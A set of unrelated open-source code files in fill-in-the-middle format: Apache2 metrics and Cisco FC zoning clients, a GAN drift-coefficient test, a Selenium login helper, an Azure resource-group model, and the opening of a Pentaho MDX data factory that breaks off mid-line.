<|file_name|>incident.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import from future import standard_library standard_library.install_aliases() from builtins import * import logging import emission.core.wrapper.wrapperbase as ecwb class Incident(ecwb.WrapperBase): props = {"loc": ecwb.WrapperBase.Access.RO, # geojson representation of the point "ts": ecwb.WrapperBase.Access.RO, # timestamp representation of the point "stress": ecwb.WrapperBase.Access.RO, # stress level (0 = no stress, 100 = max stress) "local_dt": ecwb.WrapperBase.Access.RO, # searchable datetime in local time "fmt_time": ecwb.WrapperBase.Access.RO # formatted time } enums = {} geojson = ["loc"] nullable = [] local_dates = ["local_dt"] def _populateDependencies(self):<|fim▁hole|><|fim▁end|>
pass
<|file_name|>apache2.go<|end_file_name|><|fim▁begin|>package mpapache2 import ( "errors" "fmt" "io/ioutil" "net/http" "os" "regexp" "strconv" "strings" mp "github.com/mackerelio/go-mackerel-plugin-helper" "github.com/urfave/cli" ) // Apache2Plugin for fetching metrics type Apache2Plugin struct { Host string Port uint16 Path string Header []string Tempfile string Prefix string LabelPrefix string } // MetricKeyPrefix interface for PluginWithPrefix func (c Apache2Plugin) MetricKeyPrefix() string { if c.Prefix == "" { c.Prefix = "apache2" } return c.Prefix } // GraphDefinition Graph definition func (c Apache2Plugin) GraphDefinition() map[string]mp.Graphs { labelPrefix := c.LabelPrefix // metric value structure var graphdef = map[string]mp.Graphs{ "workers": { Label: (labelPrefix + " Workers"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "busy_workers", Label: "Busy Workers", Diff: false, Stacked: true}, {Name: "idle_workers", Label: "Idle Workers", Diff: false, Stacked: true}, }, }, "bytes": { Label: (labelPrefix + " Bytes"), Unit: "bytes", Metrics: []mp.Metrics{ {Name: "bytes_sent", Label: "Bytes Sent", Diff: true, Type: "uint64"}, }, }, "cpu": { Label: (labelPrefix + " CPU Load"), Unit: "float", Metrics: []mp.Metrics{ {Name: "cpu_load", Label: "CPU Load", Diff: false}, }, }, "req": { Label: (labelPrefix + " Requests"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "requests", Label: "Requests", Diff: true, Type: "uint64"}, }, }, "scoreboard": { Label: (labelPrefix + " Scoreboard"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "score-_", Label: "Waiting for connection", Diff: false, Stacked: true}, {Name: "score-S", Label: "Starting up", Diff: false, Stacked: true}, {Name: "score-R", Label: "Reading request", Diff: false, Stacked: true}, {Name: "score-W", Label: "Sending reply", Diff: false, Stacked: true}, {Name: "score-K", Label: "Keepalive", Diff: false, Stacked: true}, {Name: "score-D", Label: "DNS lookup", Diff: false, Stacked: true}, {Name: "score-C", Label: "Closing connection", Diff: false, Stacked: true}, {Name: "score-L", Label: "Logging", Diff: false, Stacked: true}, {Name: "score-G", Label: "Gracefully finishing", Diff: false, Stacked: true}, {Name: "score-I", Label: "Idle cleanup", Diff: false, Stacked: true}, {Name: "score-", Label: "Open slot", Diff: false, Stacked: true}, }, }, } return graphdef } // main function func doMain(c *cli.Context) error { var apache2 Apache2Plugin apache2.Host = c.String("http_host") apache2.Port = uint16(c.Int("http_port")) apache2.Path = c.String("status_page") apache2.Header = c.StringSlice("header") apache2.Prefix = c.String("metric-key-prefix") apache2.LabelPrefix = c.String("metric-label-prefix") helper := mp.NewMackerelPlugin(apache2) helper.Tempfile = c.String("tempfile") helper.Run() return nil } // FetchMetrics fetch the metrics func (c Apache2Plugin) FetchMetrics() (map[string]interface{}, error) { data, err := getApache2Metrics(c.Host, c.Port, c.Path, c.Header) if err != nil { return nil, err } stat := make(map[string]interface{}) errStat := parseApache2Status(data, &stat) if errStat != nil { return nil, errStat } errScore := parseApache2Scoreboard(data, &stat) if errScore != nil { return nil, errScore } return stat, nil } // parsing scoreboard from server-status?auto func parseApache2Scoreboard(str string, p *map[string]interface{}) error { for _, line := range strings.Split(str, "\n") { matched, err := regexp.MatchString("Scoreboard(.*)", line) if err != nil { return err } if !matched { continue } record := strings.Split(line, 
":") for _, sb := range strings.Split(strings.Trim(record[1], " "), "") { if sb == "." { sb = "" } name := fmt.Sprintf("score-%s", sb)<|fim▁hole|> c, assert := (*p)[name].(float64) if !assert { c = 0.0 } (*p)[name] = c + 1.0 } return nil } return errors.New("scoreboard data is not found") } // parsing metrics from server-status?auto func parseApache2Status(str string, p *map[string]interface{}) error { Params := map[string]string{ "Total Accesses": "requests", "Total kBytes": "bytes_sent", "CPULoad": "cpu_load", "BusyWorkers": "busy_workers", "IdleWorkers": "idle_workers"} for _, line := range strings.Split(str, "\n") { record := strings.Split(line, ":") _, assert := Params[record[0]] if !assert { continue } var errParse error (*p)[Params[record[0]]], errParse = strconv.ParseFloat(strings.Trim(record[1], " "), 64) if errParse != nil { return errParse } } if len(*p) == 0 { return errors.New("status data not found") } return nil } // Getting apache2 status from server-status module data. func getApache2Metrics(host string, port uint16, path string, header []string) (string, error) { uri := "http://" + host + ":" + strconv.FormatUint(uint64(port), 10) + path req, err := http.NewRequest("GET", uri, nil) if err != nil { return "", err } for _, h := range header { kv := strings.SplitN(h, ":", 2) var k, v string k = strings.TrimSpace(kv[0]) if len(kv) == 2 { v = strings.TrimSpace(kv[1]) } if http.CanonicalHeaderKey(k) == "Host" { req.Host = v } else { req.Header.Set(k, v) } } resp, err := http.DefaultClient.Do(req) if err != nil { return "", err } if resp.StatusCode != http.StatusOK { return "", fmt.Errorf("HTTP status error: %d", resp.StatusCode) } body, err := ioutil.ReadAll(resp.Body) resp.Body.Close() if err != nil { return "", err } return string(body[:]), nil } // Do the plugin func Do() { app := cli.NewApp() app.Name = "apache2_metrics" app.Version = version app.Usage = "Get metrics from apache2." app.Author = "Yuichiro Saito" app.Email = "[email protected]" app.Flags = flags app.Action = doMain app.Run(os.Args) }<|fim▁end|>
<|file_name|>main.go<|end_file_name|><|fim▁begin|>// This file is part of Gate. // Copyright (C) 2012-2015 Cyril Adrian <[email protected]> // // Gate is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, version 3 of the License. // // Gate is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details.<|fim▁hole|>// // You should have received a copy of the GNU General Public License // along with Gate. If not, see <http://www.gnu.org/licenses/>. package main import ( "gate/client" "gate/core" ) import ( "log" "os" ) func main() { cfg, err := core.NewConfig() if err != nil { log.Fatalln(err) } err = client.Console(cfg) if err != nil { log.Fatalln(err) } os.Exit(0) }<|fim▁end|>
<|file_name|>cisco_fc_zone_client_cli.py<|end_file_name|><|fim▁begin|># (c) Copyright 2014 Cisco Systems Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # """ Script to push the zone configuration to Cisco SAN switches. """ import random import re from eventlet import greenthread from oslo_concurrency import processutils from oslo_log import log as logging from oslo_utils import excutils import six from cinder import exception from cinder.i18n import _ from cinder import ssh_utils from cinder import utils from cinder.zonemanager.drivers.cisco import exception as c_exception import cinder.zonemanager.drivers.cisco.fc_zone_constants as ZoneConstant LOG = logging.getLogger(__name__) class CiscoFCZoneClientCLI(object): """Cisco FC zone client cli implementation. OpenStack Fibre Channel zone client cli connector to manage FC zoning in Cisco SAN fabrics. Version history: 1.0 - Initial Cisco FC zone client cli """ switch_ip = None switch_port = '22' switch_user = 'admin' switch_pwd = 'none' def __init__(self, ipaddress, username, password, port, vsan): """initializing the client.""" self.switch_ip = ipaddress self.switch_port = port self.switch_user = username self.switch_pwd = password self.fabric_vsan = vsan self.sshpool = None def get_active_zone_set(self): """Return the active zone configuration. Return active zoneset from fabric. When none of the configurations are active then it will return empty map. :returns: Map -- active zone set map in the following format .. code-block:: python { 'zones': {'openstack50060b0000c26604201900051ee8e329': ['50060b0000c26604', '201900051ee8e329'] }, 'active_zone_config': 'OpenStack_Cfg' } """ zone_set = {} zone = {} zone_member = None zone_name = None switch_data = None zone_set_name = None try: switch_data = self._get_switch_info( [ZoneConstant.GET_ACTIVE_ZONE_CFG, self.fabric_vsan, ' | no-more']) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed getting active zone set " "from fabric %s", self.switch_ip) try: for line in switch_data: # Split on non-word characters, line_split = re.split(r'[\s\[\]]+', line) if ZoneConstant.CFG_ZONESET in line_split: # zoneset name [name] vsan [vsan] zone_set_name = \ line_split[line_split.index(ZoneConstant.CFG_ZONESET) + 2] continue if ZoneConstant.CFG_ZONE in line_split: # zone name [name] vsan [vsan] zone_name = \ line_split[line_split.index(ZoneConstant.CFG_ZONE) + 2] zone[zone_name] = list() continue if ZoneConstant.CFG_ZONE_MEMBER in line_split: # Examples: # pwwn c0:50:76:05:15:9f:00:12 # * fcid 0x1e01c0 [pwwn 50:05:07:68:02:20:48:04] [V7K_N1P2] zone_member = \ line_split[ line_split.index(ZoneConstant.CFG_ZONE_MEMBER) + 1] zone_member_list = zone.get(zone_name) zone_member_list.append(zone_member) zone_set[ZoneConstant.CFG_ZONES] = zone zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] = zone_set_name except Exception as ex: # In case of parsing error here, it should be malformed cli output. 
msg = _("Malformed zone configuration: (switch=%(switch)s " "zone_config=%(zone_config)s)." ) % {'switch': self.switch_ip, 'zone_config': switch_data} LOG.error(msg) exc_msg = _("Exception: %s") % six.text_type(ex) LOG.error(exc_msg) raise exception.FCZoneDriverException(reason=msg) return zone_set def add_zones(self, zones, activate, fabric_vsan, active_zone_set, zone_status): """Add zone configuration. This method will add the zone configuration passed by user. :param zones: Zone names mapped to members and VSANs Zone members are colon separated but case-insensitive .. code-block:: python { zonename1:[zonememeber1,zonemember2,...], zonename2:[zonemember1, zonemember2,...]...} e.g: { 'openstack50060b0000c26604201900051ee8e329': ['50:06:0b:00:00:c2:66:04', '20:19:00:05:1e:e8:e3:29'] } :param activate: True will activate the zone config. :param fabric_vsan: :param active_zone_set: Active zone set dict retrieved from get_active_zone_set method :param zone_status: Status of the zone :raises CiscoZoningCliException: """ LOG.debug("Add Zones - Zones passed: %s", zones) LOG.debug("Active zone set: %s", active_zone_set) zone_list = active_zone_set[ZoneConstant.CFG_ZONES] LOG.debug("zone list: %s", zone_list) LOG.debug("zone status: %s", zone_status) cfg_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] zone_cmds = [['conf'], ['zoneset', 'name', cfg_name, 'vsan', fabric_vsan]] for zone in zones.keys(): zone_cmds.append(['zone', 'name', zone]) for member in zones[zone]: zone_cmds.append(['member', 'pwwn', member]) zone_cmds.append(['end']) try: LOG.debug("Add zones: Config cmd to run: %s", zone_cmds) self._ssh_execute(zone_cmds, True, 1) if activate: self.activate_zoneset(cfg_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = _("Creating and activating zone set failed: " "(Zone set=%(zoneset)s error=%(err)s)." ) % {'zoneset': cfg_name, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def update_zones(self, zones, activate, fabric_vsan, operation, active_zone_set, zone_status): """Update the zone configuration. This method will update the zone configuration passed by user. :param zones: zone names mapped to members. Zone members are colon separated but case-insensitive .. code-block:: python { zonename1:[zonememeber1, zonemember2,...], zonename2:[zonemember1, zonemember2,...]...} e.g: { 'openstack50060b0000c26604201900051ee8e329': ['50:06:0b:00:00:c2:66:04', '20:19:00:05:1e:e8:e3:29'] } :param activate: True will activate the zone config. 
:param operation: zone add or zone remove :param fabric_vsan: Virtual San # :param active_zone_set: Active zone set dict retrieved from get_active_zone_set method :param zone_status: Status of the zone :raises CiscoZoningCliException: """ LOG.debug("Update Zones - Operation: %(op)s - Zones " "passed: %(zones)s", {'op': operation, 'zones': zones}) cfg_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] zone_cmds = [['conf'], ['zoneset', 'name', cfg_name, 'vsan', fabric_vsan]] zone_mod_cmd = [] if operation == ZoneConstant.ZONE_ADD: zone_mod_cmd = ['member', 'pwwn'] elif operation == ZoneConstant.ZONE_REMOVE: zone_mod_cmd = ['no', 'member', 'pwwn'] for zone, zone_members in zones.items(): zone_cmds.append(['zone', 'name', zone]) for member in zone_members: zone_cmds.append(zone_mod_cmd + [member]) zone_cmds.append(['end']) try: LOG.debug("Update zones: Config cmd to run: %s", zone_cmds) self._ssh_execute(zone_cmds, True, 1) if activate: self.activate_zoneset(cfg_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = (_("Updating and activating zone set failed: " "(Zone set=%(zoneset)s error=%(err)s).") % {'zoneset': cfg_name, 'err': six.text_type(e)}) LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def activate_zoneset(self, cfgname, fabric_vsan, zone_status): """Method to Activate the zone config. Param cfgname - ZonesetName.""" LOG.debug("zone status: %s", zone_status) cmd_list = [['conf'], ['zoneset', 'activate', 'name', cfgname, 'vsan', self.fabric_vsan]] if zone_status['mode'] == 'enhanced': cmd_list.append(['zone', 'commit', 'vsan', fabric_vsan]) cmd_list.append(['end']) return self._ssh_execute(cmd_list, True, 1) def get_zoning_status(self): """Return the zoning mode and session for a zoneset.""" zone_status = {} try: switch_data = self._get_switch_info( [ZoneConstant.GET_ZONE_STATUS, self.fabric_vsan]) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed getting zone status " "from fabric %s", self.switch_ip) try: for line in switch_data: # Split on non-word characters, line_split = re.split(r'[\s\[\]]+', line) if 'mode:' in line_split: # mode: <enhanced|basic> zone_status['mode'] = line_split[line_split.index('mode:') + 1] continue if 'session:' in line_split: # session: <none|a value other than none> zone_status['session'] = \ line_split[line_split.index('session:') + 1] continue except Exception as ex: # In case of parsing error here, it should be malformed cli output. msg = _("Malformed zone status: (switch=%(switch)s " "zone_config=%(zone_config)s)." ) % {'switch': self.switch_ip, 'zone_status': switch_data} LOG.error(msg) exc_msg = _("Exception: %s") % six.text_type(ex) LOG.error(exc_msg) raise exception.FCZoneDriverException(reason=msg) return zone_status def delete_zones(self, zone_names, activate, fabric_vsan, active_zone_set, zone_status): """Delete zones from fabric. 
Method to delete the active zone config zones params zone_names: zoneNames separated by semicolon params activate: True/False """ LOG.debug("zone_names %s", zone_names) active_zoneset_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] cmds = [['conf'], ['zoneset', 'name', active_zoneset_name, 'vsan', fabric_vsan]] try: for zone in set(zone_names.split(';')): cmds.append(['no', 'zone', 'name', zone]) cmds.append(['end']) LOG.debug("Delete zones: Config cmd to run: %s", cmds) self._ssh_execute(cmds, True, 1) if activate: self.activate_zoneset(active_zoneset_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = _("Deleting zones failed: (command=%(cmd)s error=%(err)s)." ) % {'cmd': cmds, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def get_nameserver_info(self): """Get name server data from fabric. This method will return the connected node port wwn list(local and remote) for the given switch fabric show fcns database """ cli_output = None return_list = [] try: cli_output = self._get_switch_info([ZoneConstant.FCNS_SHOW, self.fabric_vsan]) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed collecting fcns database " "info for fabric %s", self.switch_ip) if (cli_output): return_list = self._parse_ns_output(cli_output) LOG.info("Connector returning fcnsinfo-%s", return_list) return return_list @utils.retry(processutils.ProcessExecutionError, retries=5) def _cfg_save(self): cmd = ['copy', 'running-config', 'startup-config'] self._run_ssh(cmd, True) def _get_switch_info(self, cmd_list): stdout, stderr, sw_data = None, None, None try: stdout, stderr = self._run_ssh(cmd_list, True) LOG.debug("CLI output from ssh - output: %s", stdout) if (stdout): sw_data = stdout.splitlines() return sw_data except processutils.ProcessExecutionError as e: msg = _("Error while getting data via ssh: (command=%(cmd)s " "error=%(err)s).") % {'cmd': cmd_list, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def _parse_ns_output(self, switch_data): """Parses name server data. Parses nameserver raw data and adds the device port wwns to the list :returns: List -- list of device port wwn from ns info """ return_list = [] for line in switch_data: if not(" N " in line): continue linesplit = line.split() if len(linesplit) > 2:<|fim▁hole|> else: msg = _("Malformed show fcns database string: %s") % line LOG.error(msg) raise exception.InvalidParameterValue(err=msg) return return_list def _run_ssh(self, cmd_list, check_exit_code=True): command = ' '.join(cmd_list) if not self.sshpool: self.sshpool = ssh_utils.SSHPool(self.switch_ip, self.switch_port, None, self.switch_user, self.switch_pwd, min_size=1, max_size=5) try: with self.sshpool.item() as ssh: return processutils.ssh_execute( ssh, command, check_exit_code=check_exit_code) except Exception: with excutils.save_and_reraise_exception(): LOG.warning("Error running SSH command: %s", command) def _ssh_execute(self, cmd_list, check_exit_code=True, attempts=1): """Execute cli with status update. Executes CLI commands where status return is expected. cmd_list is a list of commands, where each command is itself a list of parameters. We use utils.check_ssh_injection to check each command, but then join then with " ; " to form a single command. """ # Check that each command is secure for cmd in cmd_list: utils.check_ssh_injection(cmd) # Combine into a single command. 
command = ' ; '.join(map(lambda x: ' '.join(x), cmd_list)) if not self.sshpool: self.sshpool = ssh_utils.SSHPool(self.switch_ip, self.switch_port, None, self.switch_user, self.switch_pwd, min_size=1, max_size=5) stdin, stdout, stderr = None, None, None LOG.debug("Executing command via ssh: %s", command) last_exception = None try: with self.sshpool.item() as ssh: while attempts > 0: attempts -= 1 try: stdin, stdout, stderr = ssh.exec_command(command) channel = stdout.channel exit_status = channel.recv_exit_status() LOG.debug("Exit Status from ssh: %s", exit_status) # exit_status == -1 if no exit code was returned if exit_status != -1: LOG.debug('Result was %s', exit_status) if check_exit_code and exit_status != 0: raise processutils.ProcessExecutionError( exit_code=exit_status, stdout=stdout, stderr=stderr, cmd=command) else: return True else: return True except Exception as e: LOG.exception('Error executing SSH command.') last_exception = e greenthread.sleep(random.randint(20, 500) / 100.0) LOG.debug("Handling error case after SSH: %s", last_exception) try: raise processutils.ProcessExecutionError( exit_code=last_exception.exit_code, stdout=last_exception.stdout, stderr=last_exception.stderr, cmd=last_exception.cmd) except AttributeError: raise processutils.ProcessExecutionError( exit_code=-1, stdout="", stderr="Error running SSH command", cmd=command) except Exception: with excutils.save_and_reraise_exception(): LOG.exception("Error executing command via ssh.") finally: if stdin: stdin.flush() stdin.close() if stdout: stdout.close() if stderr: stderr.close() def cleanup(self): self.sshpool = None<|fim▁end|>
node_port_wwn = linesplit[2] return_list.append(node_port_wwn)
<|file_name|>drift_utils_test.py<|end_file_name|><|fim▁begin|># Copyright 2021 DeepMind Technologies Limited and Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Drift utils test.""" from absl.testing import absltest from absl.testing import parameterized from dd_two_player_games import drift_utils from dd_two_player_games import gan LEARNING_RATE_TUPLES = [ (0.01, 0.01), (0.01, 0.05), (0.05, 0.01), (0.0001, 0.5)] class DriftUtilsTest(parameterized.TestCase): """Test class to ensure drift coefficients are computed correctly. Ensures that the drift coefficients in two-player games are computed as for the math for: * simultaneous updates. * alternating updates (for both player orders). """ @parameterized.parameters(LEARNING_RATE_TUPLES) def test_sim_updates(self, disc_lr, gen_lr): # player order does not matter. # the number of updates does not matter for simultaneous updates. learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) drift_coeffs = drift_utils.get_dd_coeffs( None, True, learning_rates, num_updates=None) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual(drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual(drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr) @parameterized.parameters(LEARNING_RATE_TUPLES) def test_alt_updates(self, disc_lr, gen_lr): learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) num_updates = gan.GANTuple(disc=1, gen=1) drift_coeffs = drift_utils.get_dd_coeffs( drift_utils.PlayerOrder.disc_first, False, learning_rates, num_updates=num_updates) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual(drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual( drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr * (1 - 2 * disc_lr / gen_lr)) @parameterized.parameters(LEARNING_RATE_TUPLES) def test_alt_updates_change_player_order(self, disc_lr, gen_lr):<|fim▁hole|> learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) num_updates = gan.GANTuple(disc=1, gen=1) drift_coeffs = drift_utils.get_dd_coeffs( drift_utils.PlayerOrder.gen_first, False, learning_rates, num_updates=num_updates) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual( drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr * (1 - 2 * gen_lr / disc_lr)) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual(drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr) if __name__ == '__main__': absltest.main()<|fim▁end|>
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>pub mod category; pub mod question;<|fim▁hole|><|fim▁end|>
pub mod dashboard;
<|file_name|>session.py<|end_file_name|><|fim▁begin|># Класс-помощник для работы с сессией class SessionHelper: def __init__(self, app): self.app = app # Функция входа на сайт def login(self, username, password): wd = self.app.wd<|fim▁hole|> wd.find_element_by_name("pass").click() wd.find_element_by_name("pass").clear() wd.find_element_by_name("pass").send_keys(password) wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click() # Функция выхода с сайта def logout(self): wd = self.app.wd wd.find_element_by_link_text("Logout").click() # Функция удаления фикстуры после завершения теста def destroy(self): self.app.wd.quit() # Функция проверки выхода с сайта def ensure_logout(self): wd = self.app.wd if self.is_logged_in(): self.logout() # Функция проверки входа на сайт def is_logged_in(self): wd = self.app.wd # Если на странице есть элемент с текстом "Logout", то пользователь вошел на сайт return len(wd.find_elements_by_link_text("Logout")) > 0 # Функция проверки имени с которым произошел вход на сайт def is_logged_in_as(self, username): wd = self.app.wd # Если на странице есть элемент с текстом который соответсвует имени пользователя, то есть логин return wd.find_element_by_xpath("//div/div[1]/form/b").text == "("+username+")" # Функция проверки логина во время прогона тестов def ensure_login(self, username, password): wd = self.app.wd # Если пользователь вошел на сайт if self.is_logged_in(): # И если пользователь вошел на сайт под ожидаемым именем if self.is_logged_in_as(username): # Тогда ничего не делаем return else: # Иначе производим выход с сайта, для последующего входа self.logout() self.login(username, password)<|fim▁end|>
self.app.open_home_page() wd.find_element_by_name("user").click() wd.find_element_by_name("user").clear() wd.find_element_by_name("user").send_keys(username)
<|file_name|>ResourceGroupInner.java<|end_file_name|><|fim▁begin|>/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.resources.implementation; import com.microsoft.azure.management.resources.ResourceGroupProperties; import java.util.Map; import com.fasterxml.jackson.annotation.JsonProperty; /** * Resource group information. */ public class ResourceGroupInner { /** * The ID of the resource group. */ @JsonProperty(access = JsonProperty.Access.WRITE_ONLY) private String id; /** * The name of the resource group. */ private String name; /** * The properties property. */ private ResourceGroupProperties properties; /** * The location of the resource group. It cannot be changed after the * resource group has been created. It muct be one of the supported Azure * locations. */ @JsonProperty(required = true) private String location; /** * The ID of the resource that manages this resource group. */ private String managedBy; /** * The tags attached to the resource group. */ private Map<String, String> tags; /** * Get the id value. * * @return the id value */ public String id() { return this.id; } /** * Get the name value. * * @return the name value */ public String name() { return this.name; } /** * Set the name value. * * @param name the name value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withName(String name) { this.name = name; return this; } /** * Get the properties value. * * @return the properties value */ public ResourceGroupProperties properties() { return this.properties; } /** * Set the properties value. * * @param properties the properties value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withProperties(ResourceGroupProperties properties) { this.properties = properties; return this; } /** * Get the location value. * * @return the location value */ public String location() { return this.location; } <|fim▁hole|> * * @param location the location value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withLocation(String location) { this.location = location; return this; } /** * Get the managedBy value. * * @return the managedBy value */ public String managedBy() { return this.managedBy; } /** * Set the managedBy value. * * @param managedBy the managedBy value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withManagedBy(String managedBy) { this.managedBy = managedBy; return this; } /** * Get the tags value. * * @return the tags value */ public Map<String, String> tags() { return this.tags; } /** * Set the tags value. * * @param tags the tags value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withTags(Map<String, String> tags) { this.tags = tags; return this; } }<|fim▁end|>
/** * Set the location value.
<|file_name|>AbstractMDXDataFactory.java<|end_file_name|><|fim▁begin|>/*! * This program is free software; you can redistribute it and/or modify it under the * terms of the GNU Lesser General Public License, version 2.1 as published by the Free Software * Foundation. * * You should have received a copy of the GNU Lesser General Public License along with this * program; if not, you can obtain a copy at http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html * or from the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. * * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * See the GNU Lesser General Public License for more details. * * Copyright (c) 2002-2013 Pentaho Corporation.. All rights reserved. */ package org.pentaho.reporting.engine.classic.extensions.datasources.mondrian; import mondrian.mdx.MemberExpr; import mondrian.olap.CacheControl; import mondrian.olap.Connection; import mondrian.olap.Cube; import mondrian.olap.Exp; import mondrian.olap.Hierarchy; import mondrian.olap.Literal; import mondrian.olap.Member; import mondrian.olap.MondrianException; import mondrian.olap.MondrianProperties; import mondrian.olap.OlapElement; import mondrian.olap.Parameter; import mondrian.olap.Position; import mondrian.olap.Query; import mondrian.olap.Result; import mondrian.olap.Util; import mondrian.olap.type.MemberType; import mondrian.olap.type.NumericType; import mondrian.olap.type.SetType; import mondrian.olap.type.StringType; import mondrian.olap.type.Type; import mondrian.server.Statement; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.pentaho.reporting.engine.classic.core.AbstractDataFactory; import org.pentaho.reporting.engine.classic.core.ClassicEngineBoot; import org.pentaho.reporting.engine.classic.core.DataFactory; import org.pentaho.reporting.engine.classic.core.DataFactoryContext; import org.pentaho.reporting.engine.classic.core.DataRow; import org.pentaho.reporting.engine.classic.core.ReportDataFactoryException; import org.pentaho.reporting.engine.classic.core.util.PropertyLookupParser; import org.pentaho.reporting.libraries.base.config.Configuration; import org.pentaho.reporting.libraries.base.util.CSVTokenizer; import org.pentaho.reporting.libraries.base.util.ObjectUtilities; import org.pentaho.reporting.libraries.base.util.StringUtils; import org.pentaho.reporting.libraries.formatting.FastMessageFormat; import java.lang.reflect.Array; import java.sql.SQLException; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Properties; import java.util.Set; import java.util.regex.PatternSyntaxException; /** * This data-factory operates in Legacy-Mode providing a preprocessed view on the mondrian result. It behaves exactly as * known from the Pentaho-Platform and the Pentaho-Report-Designer. This mode of operation breaks the structure of the * resulting table as soon as new rows are returned by the server. * * @author Thomas Morgner */ public abstract class AbstractMDXDataFactory extends AbstractDataFactory { /** * The message compiler maps all named references into numeric references. 
*/ protected static class MDXCompiler extends PropertyLookupParser { private HashSet<String> collectedParameter; private DataRow parameters; private Locale locale; /** * Default Constructor. */ protected MDXCompiler( final DataRow parameters, final Locale locale ) { if ( locale == null ) { throw new NullPointerException( "Locale must not be null" ); } if ( parameters == null ) { throw new NullPointerException( "Parameter datarow must not be null" ); } this.collectedParameter = new HashSet<String>(); this.parameters = parameters; this.locale = locale; setMarkerChar( '$' ); setOpeningBraceChar( '{' ); setClosingBraceChar( '}' ); } /** * Looks up the property with the given name. This replaces the name with the current index position. * * @param name the name of the property to look up. * @return the translated value. */ protected String lookupVariable( final String name ) { final CSVTokenizer tokenizer = new CSVTokenizer( name, false ); if ( tokenizer.hasMoreTokens() == false ) { // invalid reference .. return null; } final String parameterName = tokenizer.nextToken(); collectedParameter.add( parameterName ); final Object o = parameters.get( parameterName ); String subType = null; final StringBuilder b = new StringBuilder( name.length() + 4 ); b.append( '{' ); b.append( "0" ); while ( tokenizer.hasMoreTokens() ) { b.append( ',' ); final String token = tokenizer.nextToken(); b.append( token ); if ( subType == null ) { subType = token; } } b.append( '}' ); final String formatString = b.toString(); if ( "string".equals( subType ) ) { if ( o == null ) { return "null"; // NON-NLS } return quote( String.valueOf( o ) ); } final FastMessageFormat messageFormat = new FastMessageFormat( 